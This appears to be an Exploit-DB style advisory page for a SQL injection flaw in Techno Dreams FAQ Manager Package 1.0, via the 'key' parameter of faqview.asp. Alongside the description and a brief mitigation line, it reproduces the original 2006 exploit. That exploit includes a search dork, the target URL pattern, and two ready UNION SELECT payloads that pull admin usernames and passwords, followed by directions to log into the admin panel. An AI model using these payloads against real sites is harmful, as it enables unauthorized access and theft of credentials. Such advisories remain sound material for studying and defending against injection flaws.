Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability

vendor:

Techno Dreams FAQ Manager Package

by:

ajann

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Techno Dreams FAQ Manager Package

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:t-dreams:techno_dreams_faq_manager_package:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'key' parameter to '/faqview.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information from the database, including passwords and other sensitive data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before passing to the SQL statement.

Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Dork :   faqview.asp?key

# Script Page : http://www.t-dreams.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/faqview.asp?key=[SQL HERE]

Example:

//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin

With admin username and password take it,after join to login page:
../[path]/admin/

# ajann,Turkey
# ...
# Im not Hacker!

# milw0rm.com [2006-09-17]